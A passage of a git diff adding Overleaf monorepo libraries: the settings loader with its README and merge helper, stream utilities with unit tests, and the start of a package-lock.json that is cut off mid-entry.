this.ioredisConstructor.returns(this.client) + this.redis.createClient(this.client) + return (this.multi = this.client.multi()) + }) + + it('should return the old redis format for an array', function () { + this.results[0] = [null, 42] + this.results[1] = [null, 'foo'] + this.multi.exec(this.callback) + return this.callback.calledWith(null, [42, 'foo']).should.equal(true) + }) + + return it('should return the old redis format when there is an error', function () { + this.results[0] = [null, 42] + this.results[1] = ['error', 'foo'] + this.multi.exec(this.callback) + return this.callback.calledWith('error').should.equal(true) + }) + }) +}) diff --git a/libraries/redis-wrapper/tsconfig.json b/libraries/redis-wrapper/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/redis-wrapper/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/settings/.gitignore b/libraries/settings/.gitignore new file mode 100644 index 0000000..06d8e1d --- /dev/null +++ b/libraries/settings/.gitignore @@ -0,0 +1,5 @@ +/.npmrc +/node_modules + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/libraries/settings/.nvmrc b/libraries/settings/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/settings/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/settings/LICENSE b/libraries/settings/LICENSE new file mode 100644 index 0000000..54a584e --- /dev/null +++ b/libraries/settings/LICENSE @@ -0,0 +1,21 @@ +The MIT License (MIT) + +Copyright (c) 2014-2021 Overleaf + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/libraries/settings/README.md b/libraries/settings/README.md new file mode 100644 index 0000000..c06978b --- /dev/null +++ b/libraries/settings/README.md @@ -0,0 +1,19 @@ +@overleaf/settings +=================== + +A small module to allow global config settings to be set for all services +within the Overleaf architecture. + +Settings file location +---------------------- + +You can specify a custom location for the settings file by setting the +`OVERLEAF_CONFIG` environment variable. E.g. + + $ export OVERLEAF_CONFIG=/home/james/config/settings.development.js + +Otherwise, the settings will be loaded from `config/settings.NODE_ENV.js`, +where `NODE_ENV` is another environment variable, or defaults to `development`. + +The config directory is first looked for in the current directory, and then relative +to the settings module directory. 
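+
+Example
+-------
+
+Overrides are merged recursively over the defaults, so an override file only
+needs to export the settings it changes. A hypothetical override file (the
+path and values below are illustrative, not part of this module) might look
+like this:
+
+    $ export OVERLEAF_CONFIG=/etc/overleaf/settings.production.js
+
+    // /etc/overleaf/settings.production.js
+    module.exports = {
+      mongo: { url: 'mongodb://db.example.com/overleaf' },
+    }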
diff --git a/libraries/settings/Settings.js b/libraries/settings/Settings.js new file mode 100644 index 0000000..3a5f31c --- /dev/null +++ b/libraries/settings/Settings.js @@ -0,0 +1,55 @@ +/* eslint-disable no-console */ +const fs = require('node:fs') +const Path = require('node:path') +const { merge } = require('./merge') + +const CWD = process.cwd() +const ENTRY_POINT_DIR = process.argv[1] + ? Path.dirname(process.argv[1]) + : undefined +const NODE_ENV = (process.env.NODE_ENV || 'development').toLowerCase() +const SHARELATEX_CONFIG = process.env.SHARELATEX_CONFIG +const OVERLEAF_CONFIG = process.env.OVERLEAF_CONFIG || SHARELATEX_CONFIG +if (SHARELATEX_CONFIG && SHARELATEX_CONFIG !== OVERLEAF_CONFIG) { + throw new Error( + 'found mismatching SHARELATEX_CONFIG, rename to OVERLEAF_CONFIG' + ) +} + +let settings +let settingsExist = false +const defaultsPath = + pathIfExists(Path.join(CWD, 'config/settings.defaults.cjs')) || + pathIfExists(Path.join(CWD, 'config/settings.defaults.js')) || + pathIfExists(Path.join(ENTRY_POINT_DIR, 'config/settings.defaults.cjs')) || + pathIfExists(Path.join(ENTRY_POINT_DIR, 'config/settings.defaults.js')) +if (defaultsPath) { + console.log(`Using default settings from ${defaultsPath}`) + settings = require(defaultsPath) + settingsExist = true +} else { + settings = {} +} + +const overridesPath = + pathIfExists(OVERLEAF_CONFIG) || + pathIfExists(Path.join(CWD, `config/settings.${NODE_ENV}.cjs`)) || + pathIfExists(Path.join(CWD, `config/settings.${NODE_ENV}.js`)) +if (overridesPath) { + console.log(`Using settings from ${overridesPath}`) + settings = merge(require(overridesPath), settings) + settingsExist = true +} + +if (!settingsExist) { + console.warn("No settings or defaults found. I'm flying blind.") +} + +module.exports = settings + +function pathIfExists(path) { + if (path && fs.existsSync(path)) { + return path + } + return null +} diff --git a/libraries/settings/buildscript.txt b/libraries/settings/buildscript.txt new file mode 100644 index 0000000..ed79480 --- /dev/null +++ b/libraries/settings/buildscript.txt @@ -0,0 +1,10 @@ +settings +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/settings/index.js b/libraries/settings/index.js new file mode 100755 index 0000000..a2cc75a --- /dev/null +++ b/libraries/settings/index.js @@ -0,0 +1 @@ +module.exports = require('./Settings') diff --git a/libraries/settings/merge.js b/libraries/settings/merge.js new file mode 100644 index 0000000..2e11a16 --- /dev/null +++ b/libraries/settings/merge.js @@ -0,0 +1,12 @@ +function merge(settings, defaults) { + for (const [key, value] of Object.entries(settings)) { + if (typeof value === 'object' && !(value instanceof Array)) { + defaults[key] = merge(value, defaults[key] || {}) + } else { + defaults[key] = value + } + } + return defaults +} + +module.exports = { merge } diff --git a/libraries/settings/package.json b/libraries/settings/package.json new file mode 100644 index 0000000..5ddb514 --- /dev/null +++ b/libraries/settings/package.json @@ -0,0 +1,21 @@ +{ + "name": "@overleaf/settings", + "description": "A centralised settings system for Overleaf", + "version": "3.0.0", + "repository": "overleaf/settings-module", + "main": "index.js", + "scripts": { + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts 
.", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "devDependencies": { + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } +} diff --git a/libraries/settings/test/notests.js b/libraries/settings/test/notests.js new file mode 100644 index 0000000..62307e4 --- /dev/null +++ b/libraries/settings/test/notests.js @@ -0,0 +1 @@ +// There are no tests yet diff --git a/libraries/settings/tsconfig.json b/libraries/settings/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/settings/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/stream-utils/.gitignore b/libraries/stream-utils/.gitignore new file mode 100644 index 0000000..edb0f85 --- /dev/null +++ b/libraries/stream-utils/.gitignore @@ -0,0 +1,3 @@ + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/libraries/stream-utils/.mocharc.json b/libraries/stream-utils/.mocharc.json new file mode 100644 index 0000000..3be9ee5 --- /dev/null +++ b/libraries/stream-utils/.mocharc.json @@ -0,0 +1,5 @@ +{ + "ui": "bdd", + "recursive": "true", + "reporter": "spec" +} diff --git a/libraries/stream-utils/.nvmrc b/libraries/stream-utils/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/stream-utils/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/stream-utils/buildscript.txt b/libraries/stream-utils/buildscript.txt new file mode 100644 index 0000000..ad72655 --- /dev/null +++ b/libraries/stream-utils/buildscript.txt @@ -0,0 +1,10 @@ +stream-utils +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/stream-utils/index.js b/libraries/stream-utils/index.js new file mode 100644 index 0000000..e4c7d60 --- /dev/null +++ b/libraries/stream-utils/index.js @@ -0,0 +1,158 @@ +const { Writable, Readable, PassThrough, Transform } = require('node:stream') + +/** + * A writable stream that stores all data written to it in a node Buffer. + * @extends Writable + * @example + * const { WritableBuffer } = require('@overleaf/stream-utils') + * const bufferStream = new WritableBuffer() + * bufferStream.write('hello') + * bufferStream.write('world') + * bufferStream.end() + * bufferStream.contents().toString() // 'helloworld' + */ +class WritableBuffer extends Writable { + constructor(options) { + super(options) + this._buffers = [] + this._size = 0 + } + + _write(chunk, encoding, callback) { + this._buffers.push(chunk) + this._size += chunk.length + callback() + } + + _final(callback) { + callback() + } + + size() { + return this._size + } + + getContents() { + return Buffer.concat(this._buffers) + } + + contents() { + return Buffer.concat(this._buffers) + } +} + +/** + * A readable stream created from a string. 
+ * @extends Readable + * @example + * const { ReadableString } = require('@overleaf/stream-utils') + * const stringStream = new ReadableString('hello world') + * stringStream.on('data', chunk => console.log(chunk.toString())) + * stringStream.on('end', () => console.log('done')) + */ +class ReadableString extends Readable { + constructor(string, options) { + super(options) + this._string = string + } + + _read(size) { + this.push(this._string) + this.push(null) + } +} + +class SizeExceededError extends Error {} + +/** + * Limited size stream which will emit a SizeExceededError if the size is exceeded + * @extends Transform + */ +class LimitedStream extends Transform { + constructor(maxSize) { + super() + this.maxSize = maxSize + this.size = 0 + } + + _transform(chunk, encoding, callback) { + this.size += chunk.byteLength + if (this.size > this.maxSize) { + callback( + new SizeExceededError( + `exceeded stream size limit of ${this.maxSize}: ${this.size}` + ) + ) + } else { + callback(null, chunk) + } + } +} + +class AbortError extends Error {} + +/** + * TimeoutStream which will emit an AbortError if it exceeds a user specified timeout + * @extends PassThrough + */ +class TimeoutStream extends PassThrough { + constructor(timeout) { + super() + this.t = setTimeout(() => { + this.destroy(new AbortError('stream timed out')) + }, timeout) + } + + _final(callback) { + clearTimeout(this.t) + callback() + } +} + +/** + * LoggerStream which will call the provided logger function when the stream exceeds a user specified limit. It will call the provided function again when flushing the stream and it exceeded the user specified limit before. + * @extends Transform + */ +class LoggerStream extends Transform { + /** + * Constructor. + * @param {number} maxSize + * @param {function(currentSizeOfStream: number, isFlush: boolean)} fn + * @param {Object?} options optional options for the Transform stream + */ + constructor(maxSize, fn, options) { + super(options) + this.fn = fn + this.size = 0 + this.maxSize = maxSize + this.logged = false + } + + _transform(chunk, encoding, callback) { + this.size += chunk.byteLength + if (this.size > this.maxSize && !this.logged) { + this.fn(this.size) + this.logged = true + } + callback(null, chunk) + } + + _flush(callback) { + if (this.size > this.maxSize) { + this.fn(this.size, true) + } + callback() + } +} + +// Export our classes + +module.exports = { + WritableBuffer, + ReadableString, + LoggerStream, + LimitedStream, + TimeoutStream, + SizeExceededError, + AbortError, +} diff --git a/libraries/stream-utils/package.json b/libraries/stream-utils/package.json new file mode 100644 index 0000000..686084a --- /dev/null +++ b/libraries/stream-utils/package.json @@ -0,0 +1,24 @@ +{ + "name": "@overleaf/stream-utils", + "version": "0.1.0", + "description": "stream handling utilities", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "types:check": "tsc --noEmit" + }, + "author": "Overleaf (https://www.overleaf.com)", + "license": "AGPL-3.0-only", + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + 
"typescript": "^5.0.4" + } +} diff --git a/libraries/stream-utils/test/unit/LimitedStreamTests.js b/libraries/stream-utils/test/unit/LimitedStreamTests.js new file mode 100644 index 0000000..6401b7d --- /dev/null +++ b/libraries/stream-utils/test/unit/LimitedStreamTests.js @@ -0,0 +1,30 @@ +const { expect } = require('chai') +const { LimitedStream, SizeExceededError } = require('../../index') + +describe('LimitedStream', function () { + it('should emit an error if the stream size exceeds the limit', function (done) { + const maxSize = 10 + const limitedStream = new LimitedStream(maxSize) + limitedStream.on('error', err => { + expect(err).to.be.an.instanceOf(SizeExceededError) + done() + }) + limitedStream.write(Buffer.alloc(maxSize + 1)) + }) + + it('should pass through data if the stream size does not exceed the limit', function (done) { + const maxSize = 15 + const limitedStream = new LimitedStream(maxSize) + let data = '' + limitedStream.on('data', chunk => { + data += chunk.toString() + }) + limitedStream.on('end', () => { + expect(data).to.equal('hello world') + done() + }) + limitedStream.write('hello') + limitedStream.write(' world') + limitedStream.end() + }) +}) diff --git a/libraries/stream-utils/test/unit/LoggerStreamTests.js b/libraries/stream-utils/test/unit/LoggerStreamTests.js new file mode 100644 index 0000000..ed664f8 --- /dev/null +++ b/libraries/stream-utils/test/unit/LoggerStreamTests.js @@ -0,0 +1,36 @@ +const { expect } = require('chai') +const { LoggerStream } = require('../../index') + +describe('LoggerStream', function () { + it('should log the size of the stream when it exceeds the limit', function (done) { + const maxSize = 10 + const loggedSizes = [] + const loggerStream = new LoggerStream(maxSize, (size, isFlush) => { + loggedSizes.push([size, isFlush]) + if (isFlush) { + expect(loggedSizes).to.deep.equal([ + [11, undefined], + [11, true], + ]) + done() + } + }) + loggerStream.write(Buffer.alloc(maxSize)) + loggerStream.write(Buffer.alloc(1)) + loggerStream.end() + }) + + it('should not log the size of the stream if it does not exceed the limit', function (done) { + const maxSize = 10 + const loggedSizes = [] + const loggerStream = new LoggerStream(maxSize, (size, isFlush) => { + loggedSizes.push(size) + }) + loggerStream.write(Buffer.alloc(maxSize)) + loggerStream.end() + loggerStream.on('finish', () => { + expect(loggedSizes).to.deep.equal([]) + done() + }) + }) +}) diff --git a/libraries/stream-utils/test/unit/ReadableStringTests.js b/libraries/stream-utils/test/unit/ReadableStringTests.js new file mode 100644 index 0000000..b08dbc6 --- /dev/null +++ b/libraries/stream-utils/test/unit/ReadableStringTests.js @@ -0,0 +1,16 @@ +const { expect } = require('chai') +const { ReadableString } = require('../../index') + +describe('ReadableString', function () { + it('should emit the string passed to it', function (done) { + const stringStream = new ReadableString('hello world') + let data = '' + stringStream.on('data', chunk => { + data += chunk.toString() + }) + stringStream.on('end', () => { + expect(data).to.equal('hello world') + done() + }) + }) +}) diff --git a/libraries/stream-utils/test/unit/TimeoutStreamTests.js b/libraries/stream-utils/test/unit/TimeoutStreamTests.js new file mode 100644 index 0000000..2b203c5 --- /dev/null +++ b/libraries/stream-utils/test/unit/TimeoutStreamTests.js @@ -0,0 +1,22 @@ +const { expect } = require('chai') +const { TimeoutStream, AbortError } = require('../../index') + +describe('TimeoutStream', function () { + it('should emit 
an error if the stream times out', function (done) { + const timeout = 10 + const timeoutStream = new TimeoutStream(timeout) + timeoutStream.on('error', err => { + expect(err).to.be.an.instanceOf(AbortError) + done() + }) + }) + + it('should not emit an error if the stream does not time out', function (done) { + const timeout = 100 + const timeoutStream = new TimeoutStream(timeout) + setTimeout(() => { + timeoutStream.end() + done() + }, 1) + }) +}) diff --git a/libraries/stream-utils/test/unit/WritableBufferTests.js b/libraries/stream-utils/test/unit/WritableBufferTests.js new file mode 100644 index 0000000..a9b16a8 --- /dev/null +++ b/libraries/stream-utils/test/unit/WritableBufferTests.js @@ -0,0 +1,20 @@ +const { expect } = require('chai') +const { WritableBuffer } = require('../../index') + +describe('WritableBuffer', function () { + it('should store all data written to it in a node Buffer', function () { + const bufferStream = new WritableBuffer() + bufferStream.write('hello') + bufferStream.write('world') + bufferStream.end() + expect(bufferStream.contents().toString()).to.equal('helloworld') + }) + + it('should return the size of the data written to it', function () { + const bufferStream = new WritableBuffer() + bufferStream.write('hello') + bufferStream.write('world') + bufferStream.end() + expect(bufferStream.size()).to.equal(10) + }) +}) diff --git a/libraries/stream-utils/tsconfig.json b/libraries/stream-utils/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/stream-utils/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/package-lock.json b/package-lock.json new file mode 100644 index 0000000..e1e4750 --- /dev/null +++ b/package-lock.json @@ -0,0 +1,45920 @@ +{ + "name": "overleaf", + "lockfileVersion": 3, + "requires": true, + "packages": { + "": { + "name": "overleaf", + "hasInstallScript": true, + "workspaces": [ + "jobs/mirror-documentation", + "libraries/*", + "services/analytics", + "services/chat", + "services/clsi", + "services/clsi-cache", + "services/clsi-perf", + "services/contacts", + "services/docstore", + "services/document-updater", + "services/filestore", + "services/freegeoip", + "services/github-sync", + "services/history-v1", + "services/idp", + "services/latexqc", + "services/notifications", + "services/project-history", + "services/real-time", + "services/references", + "services/templates", + "services/third-party-datastore", + "services/third-party-references", + "services/tpdsworker", + "services/web", + "tools/saas-e2e" + ], + "dependencies": { + "patch-package": "^8.0.0" + }, + "devDependencies": { + "@types/chai": "^4.3.0", + "@types/chai-as-promised": "^7.1.8", + "@types/mocha": "^10.0.6", + "@typescript-eslint/eslint-plugin": "^8.0.0", + "@typescript-eslint/parser": "^8.0.0", + "eslint": "^8.15.0", + "eslint-config-prettier": "^8.5.0", + "eslint-config-standard": "^17.0.0", + "eslint-plugin-chai-expect": "^3.0.0", + "eslint-plugin-chai-friendly": "^0.7.2", + "eslint-plugin-cypress": "^2.15.1", + "eslint-plugin-import": "^2.26.0", + "eslint-plugin-mocha": "^10.1.0", + "eslint-plugin-node": "^11.1.0", + "eslint-plugin-prettier": "^4.0.0", + "eslint-plugin-promise": "^6.0.0", + "eslint-plugin-unicorn": "^56.0.0", + "prettier": "3.3.3", + "typescript": "^5.5.4" + } + }, + "jobs/mirror-documentation": { + "name": "mirror_documentation", + "version": "1.0.0", + "license": "ISC", + "dependencies": { + "bluebird": "^3.5.3", + 
"glob": "^7.1.3", + "googleapis": "^118.0.0", + "node-fetch": "^2.7.0", + "overleaf-editor-core": "*", + "swagger-client": "^3.8.24", + "tmp": "0.0.33" + } + }, + "jobs/mirror-documentation/node_modules/tmp": { + "version": "0.0.33", + "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.0.33.tgz", + "integrity": "sha512-jRCJlojKnZ3addtTOjdIqoRuPEKBvNXcGYqzO6zWZX8KfKEpnGY5jfggJQ3EjKuu8D4bJRr0y+cYJFmYbImXGw==", + "dependencies": { + "os-tmpdir": "~1.0.2" + }, + "engines": { + "node": ">=0.6.0" + } + }, + "libraries/access-token-encryptor": { + "name": "@overleaf/access-token-encryptor", + "version": "3.0.0", + "license": "AGPL-3.0-only", + "dependencies": { + "lodash": "^4.17.21" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "typescript": "^5.0.4" + } + }, + "libraries/eslint-plugin": { + "name": "@overleaf/eslint-plugin", + "version": "0.1.0", + "license": "AGPL-3.0-only", + "dependencies": { + "eslint": "^8.51.0", + "lodash": "^4.17.21" + }, + "devDependencies": { + "@typescript-eslint/parser": "^6.7.5" + } + }, + "libraries/eslint-plugin/node_modules/@typescript-eslint/parser": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/parser/-/parser-6.21.0.tgz", + "integrity": "sha512-tbsV1jPne5CkFQCgPBcDOt30ItF7aJoZL997JSF7MhGQqOeT3svWRYxiqlfA5RUdlHN6Fi+EI9bxqbdyAUZjYQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/scope-manager": "6.21.0", + "@typescript-eslint/types": "6.21.0", + "@typescript-eslint/typescript-estree": "6.21.0", + "@typescript-eslint/visitor-keys": "6.21.0", + "debug": "^4.3.4" + }, + "engines": { + "node": "^16.0.0 || >=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^7.0.0 || ^8.0.0" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "libraries/eslint-plugin/node_modules/debug": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.6.tgz", + "integrity": "sha512-O/09Bd4Z1fBrU4VzkhFqVgpPzaGbw6Sm9FEkBT1A/YBXQFGuuSxa1dN2nxgxS34JmKXqYx8CZAwEVoJFImUXIg==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "libraries/eslint-plugin/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "libraries/fetch-utils": { + "name": "@overleaf/fetch-utils", + "version": "0.1.0", + "license": "AGPL-3.0-only", + "dependencies": { + "@overleaf/o-error": "*", + "lodash": "^4.17.21", + "node-fetch": "^2.7.0", + "selfsigned": "^2.4.1" + }, + "devDependencies": { + "@types/node-fetch": "^2.6.11", + "body-parser": "^1.20.3", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "express": "^4.21.2", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "libraries/logger": { + "name": "@overleaf/logger", + "version": "3.1.1", + "license": "AGPL-3.0-only", + "dependencies": { + "@google-cloud/logging-bunyan": "^5.1.0", + "@overleaf/fetch-utils": "*", + "@overleaf/o-error": "*", + "bunyan": "^1.8.14" + }, + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + }, + 
"peerDependencies": { + "@overleaf/metrics": "*" + } + }, + "libraries/metrics": { + "name": "@overleaf/metrics", + "version": "4.2.0", + "dependencies": { + "@google-cloud/opentelemetry-cloud-trace-exporter": "^2.1.0", + "@google-cloud/profiler": "^6.0.0", + "@opentelemetry/api": "^1.4.1", + "@opentelemetry/auto-instrumentations-node": "^0.39.1", + "@opentelemetry/exporter-trace-otlp-http": "^0.41.2", + "@opentelemetry/resources": "^1.15.2", + "@opentelemetry/sdk-node": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.15.2", + "compression": "^1.7.4", + "prom-client": "^14.1.1", + "yn": "^3.1.1" + }, + "devDependencies": { + "bunyan": "^1.0.0", + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + }, + "peerDependencies": { + "@overleaf/logger": "*" + } + }, + "libraries/metrics/node_modules/yn": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yn/-/yn-3.1.1.tgz", + "integrity": "sha512-Ux4ygGWsu2c7isFWe8Yu1YluJmqVhxqK2cLXNQA5AcC3QfbGNpM7fu0Y8b/z16pXLnFxZYvWhd3fhBY9DLmC6Q==", + "engines": { + "node": ">=6" + } + }, + "libraries/mongo-utils": { + "name": "@overleaf/mongo-utils", + "version": "0.0.1", + "license": "AGPL-3.0-only", + "dependencies": { + "mongodb": "6.12.0", + "mongodb-legacy": "6.1.3" + }, + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } + }, + "libraries/o-error": { + "name": "@overleaf/o-error", + "version": "3.4.0", + "license": "MIT", + "devDependencies": { + "@types/chai": "^4.3.0", + "@types/node": "^18.17.4", + "chai": "^4.3.6", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "libraries/object-persistor": { + "name": "@overleaf/object-persistor", + "version": "1.0.2", + "license": "AGPL-3.0", + "dependencies": { + "@google-cloud/storage": "^6.10.1", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/stream-utils": "*", + "aws-sdk": "^2.1691.0", + "fast-crc32c": "overleaf/node-fast-crc32c#aae6b2a4c7a7a159395df9cc6c38dfde702d6f51", + "glob": "^7.1.6", + "range-parser": "^1.2.1", + "tiny-async-pool": "^1.1.0" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "mock-fs": "^5.2.0", + "mongodb": "6.12.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } + }, + "libraries/object-persistor/node_modules/aws-sdk": { + "version": "2.1691.0", + "resolved": "https://registry.npmjs.org/aws-sdk/-/aws-sdk-2.1691.0.tgz", + "integrity": "sha512-/F2YC+DlsY3UBM2Bdnh5RLHOPNibS/+IcjUuhP8XuctyrN+MlL+fWDAiela32LTDk7hMy4rx8MTgvbJ+0blO5g==", + "hasInstallScript": true, + "dependencies": { + "buffer": "4.9.2", + "events": "1.1.1", + "ieee754": "1.1.13", + "jmespath": "0.16.0", + "querystring": "0.2.0", + "sax": "1.2.1", + "url": "0.10.3", + "util": "^0.12.4", + "uuid": "8.0.0", + "xml2js": "0.6.2" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "libraries/object-persistor/node_modules/uuid": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.0.0.tgz", + "integrity": "sha512-jOXGuXZAWdsTH7eZLtyXMqUb9EcWMGZNbL9YcGBJl4MH4nrxHmZJhEHvyLFrkxo+28uLb/NYRcStH48fnD0Vzw==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "libraries/overleaf-editor-core": { + "version": "1.0.0", + "license": "Proprietary", + "dependencies": { + "@overleaf/o-error": "*", + "check-types": "^5.1.0", + "lodash": 
"^4.17.19", + "p-map": "^4.0.0", + "path-browserify": "^1.0.1" + }, + "devDependencies": { + "@types/check-types": "^7.3.7", + "@types/path-browserify": "^1.0.2", + "chai": "^3.3.0", + "mocha": "^11.1.0", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } + }, + "libraries/overleaf-editor-core/node_modules/chai": { + "version": "3.5.0", + "resolved": "https://registry.npmjs.org/chai/-/chai-3.5.0.tgz", + "integrity": "sha1-TQJjewZ/6Vi9v906QOxW/vc3Mkc=", + "dev": true, + "dependencies": { + "assertion-error": "^1.0.1", + "deep-eql": "^0.1.3", + "type-detect": "^1.0.0" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "libraries/overleaf-editor-core/node_modules/deep-eql": { + "version": "0.1.3", + "resolved": "https://registry.npmjs.org/deep-eql/-/deep-eql-0.1.3.tgz", + "integrity": "sha1-71WKyrjeJSBs1xOQbXTlaTDrafI=", + "dev": true, + "dependencies": { + "type-detect": "0.1.1" + }, + "engines": { + "node": "*" + } + }, + "libraries/overleaf-editor-core/node_modules/deep-eql/node_modules/type-detect": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-0.1.1.tgz", + "integrity": "sha1-C6XsKohWQORw6k6FBZcZANrFiCI=", + "dev": true, + "engines": { + "node": "*" + } + }, + "libraries/overleaf-editor-core/node_modules/type-detect": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-1.0.0.tgz", + "integrity": "sha1-diIXzAbbJY7EiQihKY6LlRIejqI=", + "dev": true, + "engines": { + "node": "*" + } + }, + "libraries/piece-table": { + "name": "@overleaf/piece-table", + "version": "1.0.0", + "license": "Proprietary", + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "libraries/promise-utils": { + "name": "@overleaf/promise-utils", + "version": "0.1.0", + "license": "AGPL-3.0-only", + "dependencies": { + "p-limit": "^2.3.0" + }, + "devDependencies": { + "chai": "^4.3.10", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "libraries/promise-utils/node_modules/chai": { + "version": "4.3.10", + "resolved": "https://registry.npmjs.org/chai/-/chai-4.3.10.tgz", + "integrity": "sha512-0UXG04VuVbruMUYbJ6JctvH0YnC/4q3/AkT18q4NaITo91CUm0liMS9VqzT9vZhVQ/1eqPanMWjBM+Juhfb/9g==", + "dev": true, + "dependencies": { + "assertion-error": "^1.1.0", + "check-error": "^1.0.3", + "deep-eql": "^4.1.3", + "get-func-name": "^2.0.2", + "loupe": "^2.3.6", + "pathval": "^1.1.1", + "type-detect": "^4.0.8" + }, + "engines": { + "node": ">=4" + } + }, + "libraries/promise-utils/node_modules/deep-eql": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/deep-eql/-/deep-eql-4.1.3.tgz", + "integrity": 